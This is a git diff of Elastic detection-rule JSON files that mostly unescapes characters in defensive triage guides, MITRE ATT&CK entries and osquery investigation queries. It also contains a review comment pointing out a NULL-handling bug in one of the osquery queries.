digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. 
If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -48,7 +48,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_105.json b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_105.json
index 52b49a273ad..beb7c67f85e 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e40d56f-5c0e-4ac6-aece-bee96645b172_105.json
@@ -15,7 +15,7 @@ "v3_windows_anomalous_process_all_hosts" ], "name": "Anomalous Process For a Windows Population", - "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. 
Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - 
!{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- 
Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Anomalous Process For a Windows Population\n\nSearching for abnormal Windows processes is a good methodology to find potentially malicious activity within a network. Understanding what is commonly run within an environment and developing baselines for legitimate activity can help uncover potential malware and suspicious behaviors.\n\nThis rule uses a machine learning job to detect a Windows process that is rare and unusual for all of the monitored Windows hosts in your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the parent process is a legitimate system utility or service, this could be related to software updates or system management. 
If the parent process is something user-facing like an Office application, this process could be more suspicious.\n - Investigate the process metadata \u2014 such as the digital signature, directory, etc. \u2014 to obtain more context that can indicate whether the executable is associated with an expected software vendor or package.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Consider the user as identified by the `user.name` field. Is this program part of an expected workflow for the user who ran this program on this host?\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Validate if the activity has a consistent cadence (for example, if it runs monthly or quarterly), as it could be part of a monthly or quarterly business process.\n- Examine the arguments and working directory of the process. These may provide indications as to the source of the program or the nature of the tasks it is performing.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, 
display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSyste' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Retrieve Service Unisgned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Unusual Process For a Windows Host - 6d448b96-c922-4adb-b51c-b767f1ea5b76\n- Unusual Windows Path Activity - 445a342e-03fb-42d0-8656-0367eb2dead5\n- Unusual Windows Process Calling the Metadata Service - abae61a8-c560-4dbd-acca-1e1438bff36b\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], 
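Review bot: The `Osquery - Retrieve Services Running on User Accounts` query embedded in the new-side `note` string of this hunk (unchanged in substance by the commit, which only rewrites the `\u003e` escapes) can never return a row: in osquery's SQLite engine `user_account == null` evaluates to NULL, so for every non-system account the `NOT (... OR NULL)` predicate is NULL and the row is filtered out. The `'%LocalSyste'` pattern also looks truncated and would not match an account ending in `LocalSystem`. A predicate that does what the label promises is `WHERE user_account IS NOT NULL AND NOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService')`. The label `Retrieve Service Unisgned Executables with Virustotal Link` also misspells `Unsigned`; the same note text appears in the hunk ending at L2702, and if these rule JSON files are generated from the upstream rule sources the fix belongs there rather than in this package.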
@@ -43,7 +43,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -58,7 +58,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_103.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_103.json
index e1868f68d29..16c80247bb9 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_104.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_104.json
index c2bd2f46a1e..4802c2f1123 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_104.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_105.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_105.json
index 000de267d57..1e194dad0f1 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_105.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_106.json b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_106.json
index 0d5d2b65cae..23e020a4056 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9130a5-9be6-48e5-943a-9628bfc74b18_106.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_102.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_102.json
index 4bb32a90492..0d818b33ffa 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_102.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 21,
 "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_103.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_103.json
index 2a9a7a563e6..ed4be6d6e05 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_103.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 21,
 "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_104.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_104.json
index f281b0fb275..504d54c0b5e 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_104.json
@@ -49,7 +49,7 @@
 ],
 "risk_score": 21,
 "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -60,7 +60,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_105.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_105.json
index b4c33808416..ea544b8f50e 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_105.json
@@ -48,7 +48,7 @@
 ],
 "risk_score": 21,
 "rule_id": "6e9b351e-a531-4bdc-b73e-7034d6eed7ff",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_106.json b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_106.json
index 1d77f11b042..4ebf2348513 100644
--- a/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/6e9b351e-a531-4bdc-b73e-7034d6eed7ff_106.json
@@ -58,7 +58,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_102.json b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_102.json
index 45d5ecfaaee..2eaf4e7234a 100644
--- a/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/6ea41894-66c3-4df7-ad6b-2c5074eb3df8_102.json
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Windows Error Manager Masquerading", - "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Windows Error Manager Masquerading\n\nBy examining the specific traits of Windows binaries -- such as process trees, command lines, network connections, registry modifications, and so on -- it's possible to establish a baseline of normal activity. 
Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThis rule identifies a potential malicious process masquerading as `wermgr.exe` or `WerFault.exe`, by looking for a process creation with no arguments followed by a network connection.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell 
`Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
